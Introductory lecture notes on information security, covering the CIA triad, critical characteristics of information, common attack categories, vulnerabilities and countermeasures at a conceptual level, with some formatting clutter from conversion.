 Chapter 1: Introduction to Information Security

 Introduction
 “The quality or state of being secure to be free from danger”
 To be protected from adversaries from those who would do harm, intentionally or
otherwise
 Freedom from risk or danger; safety.
 Freedom from doubt, anxiety, or fear; confidence
 A successful organization should have multiple layers of security in place:
o Physical security
o Personal security
o Operations security
o Communications security
o Network security
o Information security

 Why do we need security?

 Protect vital information while still allowing access to those who need it ✓ Trade secrets,
medical records, etc.
 Provide authentication and access control for resources
 Guarantee availability of resources
 Ex: 5 9’s (99.999% reliability) Who is vulnerable?
 Financial institutions and banks
 Internet service providers
 Medical companies
 Government and defense agencies
 Contractors to various government agencies
 Multinational corporations
 Anyone on the network

 Common security attacks and their countermeasures

 Finding a way into the network → Firewalls

 Exploiting software bugs, buffer overflows→ Intrusion Detection Systems
 Denial of Service → Ingress filtering, IDS
 TCP hijacking → IPsec
 Packet sniffing → Encryption (SSH, SSL, HTTPS)
 Social problems → Education
 Why Security?
 The Internet was initially designed for connectivity
 Trust assumed
 We do more with the Internet nowadays
 Security protocols are added on top of the TCP/IP

 Fundamental aspects of information must be protected

 Confidential data
 Employee information
 Business models
 Protect identity and resources
 We can’t keep ourselves isolated from the Internet
 Most business communications are done online
 We provide online services
 We get services from third-party organizations online
 While many causes exist for security problems, at least three types of fundamental
weaknesses open the door to security problems.
o Technology weakness
o Policy weakness
o Configuration weakness

 Insecurity will increase in line with

 Not patching our systems
 Using weak passwords such as “password” or “1234”
 Downloading programs from the Internet
 Opening e-mail attachments from unknown senders
 Using wireless networks without encryption

 Problem: Networks helps to share resources

 Computer networks are typically a shared resource used by many applications
representing different interests.
 The Internet is particularly widely shared, being used by competing businesses,
individuals/business with conflicting interests, and opportunistic criminals.
 Unless security measures are taken, a network conversation or a distributed application
may be compromised by an adversary
 Computer Security
 It is Information security as applied to computers and networks.
 The objectives- Protection of information from:
o Theft,
o Corruption,
o Damage from disaster,
 Definition
 Security: The prevention and protection of computer assets from unauthorized access,
use, alteration, degradation, destruction, and other threats.

 “The term computer system security means the collective processes and mechanisms by
which sensitive and valuable information and services are protected from publication,
tamper [ alter] or collapse by unauthorized activities or untrustworthy individuals and
unplanned events respectively.

 Defining- Information Security

 Computer or Information Technology can be used for productive or destructive
purposes
 Computer Security → refers to techniques for ensuring that data stored in a computer
cannot be read or compromised by any individuals without authorization.
 Computer Security → The provisions and policies adopted to protect information and
property from theft, corruption, or natural disaster while allowing the information and
property to remain accessible and productive to its intended users.
 Privacy
 Privacy: The legal rights of the groups/individuals/organizations to be protected against
unauthorized intrusion into his personal life/affairs, by direct physical means or by
publication of information.
 Security or Privacy Threat: Any individual group, act, or object that poses a danger to
computer security and privacy is known as threat.

o
 No Tension??
 No Computer
 No Network
 No Internet
• The most secured manner→ Either no computers or are those not connected to any
Network or Internet and protected from any intrusion
 What Is Information Security?
 Deals with several different "trust" aspects of information and its protection.
 “Protection of information systems against unauthorized access to or modification of
information, whether in storage, processing or transit, and against the denial of service to
authorized users or the provision of service to unauthorized users, including those
measures necessary to detect, document, and counter such threats.”
 Information security is defined as “protecting information and information systems from
unauthorized access, use, disclosure, disruption, modification, or destruction, "according
to U.S. law.
 In essence, it means we want to protect our data and our systems from those who would
seek to misuse it.
 What is Information Security
 The protection of information and its critical elements, including systems that uses,
stores, and transmits information
 Necessary tools: policy, awareness, training, education, technology
 IS security being the collection of activities that protect the information system and the
data stored in it.
 The protection of information and its critical elements, including systems and hardware
that use, store, and transmit that information.
 Information security: a “well-informed sense of assurance that the information risks and
controls are in balance.”
 IS security being a classic battle of “good vs. evil.”
 Computer security: The protection afforded to an automated information system in
order to attain the applicable objectives of preserving the integrity, availability and
confidentiality of information system resources (includes hardware, software, firmware,
information/data, and telecommunications).
 IT Security Management: a process used to achieve and maintain appropriate levels of
confidentiality, integrity, availability, accountability, authenticity and reliability.
 IT Security Management functions include:
o Organizational IT security objectives, strategies and policies
o Determining organizational IT security requirement
o Identifying and analyzing security threats to IT assets
o Identifying and analyzing risks
o Specifying appropriate safeguards
o Monitoring the implementation and operation of safeguards
o Developing and implement a security awareness program
o Detecting and reacting to incidents
 o In a general sense, security means protecting our assets.
o This may mean protecting them from attackers invading our networks, natural
disasters, adverse environmental conditions, power failures, theft or vandalism, or
other undesirable states.
o Ultimately, we will attempt to secure ourselves against the most likely forms of
attack, to the best extent we reasonably can, given our environment.
 Securing Components in IS
 Computer (software and hardware) is the key component in an information system
 Computer can be subject of an attack and/or the object of an attack
o When the subject of an attack, computer is used as an active tool to conduct attack
o When the object of an attack, computer is the entity being attacked
o The attacks can also be two types
• Direct (the attack is directed to the computer itself)
• Indirect (the computer is attacked to cause problem to other system e.g. DOS)
 Physical security – To protect the physical items, objects, or areas of an organization
from unauthorized access and misuse.
 Personal security – To protect the individual or group of individuals who are authorized
to access the organization and its operations.
 Operations security – To protect the details of a particular operation or series of activities.
 Communications security – To protect an organization’s communications media,
technology, and content.
 Network security – To protect networking components, connections, and contents.

 Computer as Subject and Object of an attack


 Common Computer Security Measures
 Most computer security measures involve data encryption and passwords.
 Data encryption is the translation of data into a form that cannot be read without a
deciphering mechanism.
 A password is a secret word or phrase that gives a user access to a particular program or
system.
 Goals of Computer Security / Information Security
 To maintain information Confidentiality
 To ensure the Integrity and Reliability of data resources
 To ensure the Uninterrupted Availability of data resources and online operations
 To prevent Non-repudiation of information sent in reference to security and privacy
laws and guidelines

 Computer Security Goals

•
 Information Security: Basic Requirements also known as the security triads:(CIA)

 Necessary tools for information security: policy, awareness, training, education,

technology
 C.I.A. Triangle
 Industry standard for computer security since the development of the mainframe.
 It was solely based on three characteristics that described the utility of information:
confidentiality, integrity, and availability.
 When you design and use security controls, you are addressing one or more of these
components.
 Three widely accepted elements or areas of focus (referred to as the “CIA Triad”):

o Confidentiality
o Integrity
o Availability (Recoverability)
 Includes Physical Security as well as Electronic
 

 Information Security: Basic Requirements

 Confidentiality - it refers to information protection from unauthorized read operations
o the term privacy is often used when data to be protected refer to individuals
o The quality or state of preventing disclosure or exposure to unauthorized
individuals or systems.
• Data confidentiality: Assures that confidential information is not disclosed to
unauthorized individuals
 Of personal data and information
 Credit card account numbers and bank account numbers
 Social Security numbers and address information
 Of intellectual property of businesses
 Copyrights, patents, and secret formulas
 Source code, customer databases, and technical specifications Of
national security
 Military intelligence
 Homeland security and government-related information
 Integrity - it refers to information protection from modifications; it involves several
goals:

o Assuring the integrity of information with respect to the original information

(relevant especially in web environment) – often referred to as authenticity
o Protecting information from unauthorized modifications
o Protecting information from incorrect modifications – referred to as semantic
integrity. ✓ The quality or state of being whole, complete, and uncorrupted.
• Data integrity: assures that information and programs are changed only in a
specified and authorized manner
• System integrity: Assures that a system performs its operations in unimpaired
manner
 • The integrity of information is threatened when the information is exposed to
corruption, damage, destruction, or other disruption of its authentic state.
• Data has integrity if the data is not altered, is valid, and is accurate
 Of user names and passwords; patents and copyrights, source
code; diplomatic information, financial data

 Availability - it ensures that access to information is not denied to authorized(legitimate)

subjects
o Enables users who need to access information to do so without interference or
obstruction and in the required format.
o Assures that systems work promptly and service is not denied to authorized users
o The information is said to be available to an authorized user when and where
needed and in the correct format.
o In the context of information security, availability is generally expressed as
the amount of time users can use a system, application, and data.
 Uptime: The total amount of time that a system, application,
and data are accessible.
 Downtime: The total amount of time that a system, application,
and data are not accessible.
o Availability = (Total Uptime) / (Total Uptime + Total Downtime)

 Although the use of the CIA triad to define security objectives is well established, some
in the security field feel that additional concepts are needed to present a complete picture.
Two of the most commonly mentioned are:
o Authenticity: The property of being genuine and being able to be verified and
trusted; confidence in the validity of a transmission, a message, or message
originator.
o Accountability: The security goal that generates the requirement for actions of an
entity to be traced uniquely to that entity.
 Critical Characteristics of Information
 The C.I.A. triangle has expanded into a list of critical characteristics of information ✓
The value of information comes from the characteristics it possesses:
o Accuracy – Free from mistake or error and having the value that the end user
expects. If information contains a value different from the user’s expectations due
to the intentional or unintentional modification of its content, it is no longer
accurate.
o Authenticity –The quality or state of being genuine or original, rather than a
reproduction or fabrication. Information is authentic when it is the information
that was originally created, placed, stored, or transferred.
o Utility – The quality or state of having value for some purpose or end.
Information has value when it serves a particular purpose. This means that if
information is available, but not in a format meaningful to the end user, it is not
useful.
 o Possession – The quality or state of having ownership or control of some object or
item. Information is said to be in possession if one obtains it, independent of
format or other characteristic. While a breach of confidentiality always results in a
breach of possession, a breach of possession does not always result in a breach of
confidentiality.
 Why Is Computer Network and Information Security Important?
 To protect company assets
 To gain a competitive advantage
 To comply with regulatory requirements and fiduciary responsibilities ✓ To keep your
job.
 The growing fear of cyber terrorism
 Attacks to the infrastructure would affect a large portion of the Internet and create a large
amount of service disruption
 Challenges in Computer Network and Information security
 The requirements seem to be straightforward; indeed, most of the major requirements for
security services can be given self-explanatory, one-word labels: confidentiality,
authentication, nonrepudiation, or integrity. But the mechanisms used to meet those
requirements can be quite complex, and understanding them may involve rather subtle
reasoning.
 In developing a particular security mechanism or algorithm, one must always consider
potential attacks on those security features. In many cases, successful attacks are
designed by looking at the problem in a completely different way, therefore exploiting an
unexpected weakness in the mechanism.
 The procedures used to provide particular security services are often counter intuitive.
Typically, a security mechanism is complex, and it is not obvious from the statement of a
particular requirement that such elaborate measures are needed.
 Security mechanisms, it is necessary to decide where to use them. This is true both in
terms of physical placement and in a logical sense.
 Security mechanisms typically involve more than a particular algorithm or protocol. They
also require that participants be in possession of some secret information (e.g., an
encryption key), which raises questions about the creation, distribution, and protection of
that secret information.
 It is a battle of wits between a perpetrator who tries to find holes and the designer or
administrator who tries to close them. The great advantage that the attacker has is that he
or she need only find a single weakness, while the designer must find and eliminate all
weaknesses to achieve perfect security.
 There is a natural tendency on the part of users and system managers to perceive little
benefit from security investment until a security failure occurs.
 Security requires regular, even constant, monitoring, and this is difficult in today’s short-
term, overloaded environment.
 Security is still too often an afterthought to be incorporated into a system after the design
is complete rather than being an integral part of the design process.
 Many users and even security administrators view strong security as an impediment to
efficient and user-friendly operation of an information system or use of information. The
 difficulties just enumerated will be encountered in numerous ways as we examine the
various security threats and mechanisms.
 Internet infrastructures are vulnerable.
 Solutions usually require a larger scale of modification
 Security and performance tradeoff
 Security is only as strong as the weakest link
 Attacks can be easily launched and difficult to be traced
 What are the basic security measures?
 External security: is about protection of computer systems from environmental damages
such as floods and heat, physical security such as locking rooms and computers and
electrical protection such as power surge and electromagnetic interfaces.
 Operational security: is about deciding who has access to what, limiting access time and
location
 Surveillance: proper placement of a security cameras and can deter theft and vandalism
 Passwords/authentication: the most common form of security. There are some simple
rules for password security systems like:
o Change your password often
o Pick a good, strong and random password
o Don’t share password or write down them
o Don’t select/use names and familiar objects as password
o Authentication: the process of reliably verifying the identity of
someone/something by means of a secret (password), an object (smart card),
physical characteristics (finger print) and trust.
 Auditing: used to detect wrong doing
 Access rights: determines the security by means of who and how. Who do you give
access right to? (No One, Group of Users, entire set of Users). How a user/group of users
does have access? (Read, write, delete, print, copy, execute).
 Viruses/worms and antivirus tools
 Firewalls
 Encryption and Decryption Techniques
 Digital Signature
 Security Policy
 Categories of attacks
 Interruption: An attack on availability
 Interception: An attack on confidentiality
 Modification: An attack on integrity
 Fabrication: An attack on authenticity
 Categories of Attacks/Threats

 Some Types of Attacks

 What are some common attacks?
o Network Attacks
• Packet sniffing, man-in-the-middle o Web attacks
• Phishing, Cross Site Scripting o OS, applications and software attacks
• Virus, Trojan, Worms, Rootkits, Buffer Overflow
 Not all hackers are evil wrongdoers trying to steal your info o Ethical Hackers,
Consultants, Penetration testers, Researchers
 Network Attacks
 Packet Sniffing o Internet traffic consists of data “packets”, and these can be “sniffed”
o Leads to other attacks such as password sniffing, cookie stealing session hijacking,
information stealing
 Man in the Middle
o Insert a router in the path between client and server, and change the packets as
they pass through
 Web Attacks
 Phishing
o An evil website pretends to be a trusted website o Example:
• You type, by mistake, “mibank.com” instead of “mybank.com”
• mibank.com designs the site to look like mybank.com so the user types in their
info as usual
• BAD! Now an evil person has your info!
 Cross Site Scripting o Writing a complex Javascript program that steals data left by
other sites that you have visited in same browsing session
 Computer Security Components
 Vulnerability is a point where a system is susceptible to attack.
 A threat is a possible danger to the system. The danger might be a person (a system
cracker or a spy), a thing (a faulty piece of equipment), or an event (a fire or a flood) that
might exploit a vulnerability of the system.
 Countermeasures are techniques for protecting your system
  Vulnerability in Computing
 In computer security, vulnerability is a weakness which allows an attacker to reduce a
system's information assurance.
 Vulnerability is the intersection of three elements:
o A system susceptibility or flaw itself(fault),
o Attacker access to the flaw(fault), and
o Attacker capability to exploit the flaw (fault).
 To exploit vulnerability, an attacker must have at least one applicable tool or technique
that can connect to a system weakness. In this frame, vulnerability is also known as the
attack surface.
 Defining vulnerability
 “A weakness of an asset or group of assets that can be exploited by one or more
threats.”
 Where an asset is anything that can has value to the organization, its business operations
and their continuity, including information resources that support the organization's
mission
ISO 27005 definition
 Types of Vulnerabilities
 Physical vulnerabilities (Ex. Buildings)
 Natural vulnerabilities (Ex. Earthquake)
 Hardware and Software vulnerabilities (Ex. Failures)
 Media vulnerabilities (Ex. Disks can be stolen)
 Communication vulnerabilities (Ex. Wires can be tapped)
 Human vulnerabilities (Ex. Insiders)

 Classification of Vulnerabilities

 Hardware o Susceptibility to humidity

o Susceptibility to dust o susceptibility
to soiling
susceptibility to unprotected storage
 Software
o insufficient testing
o lack of audit trail
 Network o unprotected
communication lines o insecure
network architecture
 Personnel
o inadequate recruiting process
o inadequate security awareness
 Site o area subject to flood o
unreliable power source
 Organizational
o lack of regular audits
o lack of continuity plans
o lack of security
 Causes of Vulnerabilities
 Complexity: Large, complex systems increase the probability of flaws and unintended
access points
 Familiarity: Using common, well-known code, software, operating systems, and/or
hardware increases the probability an attacker has or can find the knowledge and tools to
exploit the flaw
 Connectivity: More physical connections, privileges, ports, protocols, and services and
time each of those are accessible increase vulnerability
 Password management flaws: The computer user uses weak passwords that could be
discovered by brute force. The computer user stores the password on the computer where
a program can access it. Users re-use passwords between many programs and websites. 5.
Internet Website Browsing: Some internet websites may contain harmful Spyware or
Adware that can be installed automatically on the computer systems. After visiting those
websites, the computer systems become infected and personal information will be
collected and passed on to third party individuals.
 Software bugs: The programmer leaves an exploitable bug in a software program. The
software bug may allow an attacker to misuse an application.
 Not learning from past mistakes: for example, most vulnerabilities discovered in IPv4
protocol software were discovered in the new IPv6 implementations
 The research has shown that the most vulnerable point in most information systems
is the human user, operator, designer, or other human: so, humans should be
o considered in their different roles as asset, threat, information resources. Social
engineering is an increasing security concern.
 A threat is a potential or actual adverse event that may be malicious or incidental, and
that can compromise the assets of an enterprise or the integrity of a computer or network.
 Countermeasures can take the form of software, hardware and modes of behavior.
Software countermeasures include:
 personal firewalls
 anti-virus software
 pop-up blockers
 Spyware detection/removal programs
 Computer security controls
 Authentication (Password, Cards, Biometrics) (What we know, have, are!)
 Encryption
 Auditing
 Administrative procedures
 Standards
 Physical Security
 Laws